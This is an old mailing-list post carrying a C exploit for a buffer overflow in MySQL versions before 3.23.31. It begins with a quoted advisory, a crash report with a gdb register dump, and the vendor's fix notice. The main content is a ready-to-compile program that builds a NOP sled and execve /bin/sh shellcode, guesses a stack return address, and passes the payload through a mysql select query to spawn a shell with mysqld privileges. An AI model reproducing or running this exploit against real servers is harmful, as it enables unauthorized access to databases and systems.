Sorry, here's the REAL exploit =) Regardz, wC [Luis Miguel Silva]
/* Linux MySQL Exploit by Luis Miguel Silva [aka wC] [EMAIL PROTECTED] 19/01/y2k+1 Compile: gcc MySQLXploit.c -o MySQLX Run with: You can specify the offset for the exploit passing it as the 1st arg... Example: ./MySQLX 0 ---> this is the default offset :] Advisorie: [from a bugtraq email] Hi, all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the server and which seems to be exploitable (ie. 4141414 in eip) Problem : An attacker could gain mysqld privileges (gaining access to all the databases) Requirements : You need a valid login/password to exploit this Solution : Upgrade to 3.23.31 Proof-of-concept code : None Credits : I'm not the discoverer of this bug The first public report was made by [EMAIL PROTECTED] via the MySQL mailing-list See the following mails for details Regards, Nicob Here the original post to the MySQL mailing-list : ================================================== On Jan 12, Jo?o Gouveia wrote: > Hi, > > I believe i've found a problem in MySql. Here are some test's i've made in > 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't > debug it, just tested to see if crashes ).Confirmed up to latest 3.23 > On one terminal: > <quote> > spike:/var/mysql # /sbin/init.d/mysql start > Starting service MySQL. > Starting mysqld daemon with databases from /var/mysql > done > spike:/var/mysql # ></quote> > > On the other terminal: > <quote> > jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' > Enter password: > (hanged..^C) > </quote> > > On the first terminal i got: > <quote> > spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault > nohup > $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin > g "$@" >>$err_log 2>&1> > Number of processes running now: 0 > mysqld restarted on Fri Jan 12 07:10:54 WET 2001 > mysqld daemon ended > </quote> > > gdb shows the following: > <quote> > (gdb) run > Starting program: /usr/sbin/mysqld > [New Thread 16897 (manager thread)] > [New Thread 16891 (initial thread)] > [New Thread 16898] > /usr/sbin/mysqld: ready for connections > [New Thread 16916] > [Switching to Thread 16916] > > Program received signal SIGSEGV, Segmentation fault. > 0x41414141 in ?? () > (gdb) info all-registers > eax 0x1 1 > ecx 0x68 104 > edx 0x8166947 135686471 > ebx 0x41414141 1094795585 > esp 0xbf5ff408 0xbf5ff408 > ebp 0x41414141 0x41414141 > esi 0x41414141 1094795585 > edi 0x0 0 > eip 0x41414141 0x41414141 > eflags 0x10246 66118 > cs 0x23 35 > ss 0x2b 43 > ds 0x2b 43 > es 0x2b 43 > fs 0x0 0 > gs 0x0 0 > (gdb) > </quote> > > looks like a tipical overflow to me. > Please reply asap, at least to tell me i'me not seeing things. :-)> > Best regards, > > Joao Gouveia aka Tharbad. > > [EMAIL PROTECTED] Here the reponse to a email I send today to the MySQL list : ============================================================ Sergei Golubchik (MySQL team) wrote : > > Hi! > > On Jan 18, Nicolas GREGOIRE wrote: > > Hi, > > > > Still not any info about the buffer-overflow discovered last week ? > > Shouldn't be fixed at the beginning of the week ? > > > > Please, dear MySQL team, give us info !! > > > > Regards, > > Nicob > > Fixed in latest release (3.23.31). > > Regards, > Sergei Here an part of the 3.23.30 to 3.23.31 diff : ============================================= +Changes in release 3.23.31 +-------------------------- + + * Fixed security bug in something (please upgrade if you are using a + earlier MySQL 3.23 version). End of Advisorie Final Words: Yes..i'm still alive...<g> [just a'sleep..] A big kiss to niness and hugs to all my friends... lucipher && all of the unsecurity.org crew... JFA and all of the AngelSP [pseudo :P]'crew... Ahmm...i just wave everybody :] */ #include <stdio.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 130 #define NOP 0x90 // Our EVIL code... char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } // Where it all happens... main(int argc, char *argv[]) { char *buffer, *ptr, tmp[1500]; long *addr_ptr, addr; int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET; printf("\nMySQL [all versions < 3.23.31] Local Exploit by [EMAIL PROTECTED]\n\n"); if (argc==2) offset=atoi(argv[1]); else printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n"); printf("Trying to allocate memory for buffer (%d bytes)...",bsize); if (!(buffer = malloc(bsize))) { printf("ERROR!\n"); printf("Couldn't allocate memory...\n"); printf("Exiting...\n"); exit(0); } printf("SUCCESS!\n"); addr=get_sp()-offset; printf("Using address : 0x%x\n", addr); printf("Offset : %d\n",offset); printf("Buffer Size : %d\n",bsize); ptr=buffer; addr_ptr=(long *) ptr; for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr; for (i=0;i<bsize/2;i++) buffer[i]=NOP; ptr=buffer+((bsize/2)-(strlen(shellcode)/2)); for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buffer[bsize-1]='\0'; snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer); printf("Oh k...i have the evil'buffer right here :P\n"); printf("So...[if all went well], prepare to be r00t...\n"); system(tmp); }